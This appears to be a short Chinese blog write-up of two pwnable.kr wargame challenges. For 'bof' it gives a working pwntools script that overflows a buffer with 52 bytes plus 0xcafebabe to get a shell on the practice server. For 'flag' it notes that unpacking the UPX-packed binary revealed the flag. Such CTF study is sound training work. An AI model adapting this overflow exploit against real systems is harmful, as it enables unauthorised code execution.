pwnable.kr第二天

博客介绍两道题的解题情况。一题是简单的数组越界覆盖,用gdb调试出偏移即可;另一题是upx加壳题,发现upx字样后用upx.exe操作得到flag。

3、bof

这题就是简单的数组越界覆盖,直接用gdb 

调试出偏移就ok

from pwn import *
context.log_level='debug'
payload='A'*52+p32(0xcafebabe)
print payload
turn=True
if turn:
    p=remote('pwnable.kr',9000)
else:
    p=process('./bof')
p.sendline(payload)
p.interactive()

 

4、flag

这道题。。。严重坑,没想到是upx 加壳。。。呜呜·····

最后还是无意中看到了 upx这个字样。。。然后果断 upx.exe ..然后flag就出来了。

 

转载于:https://www.cnblogs.com/liyuechan/p/10902825.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值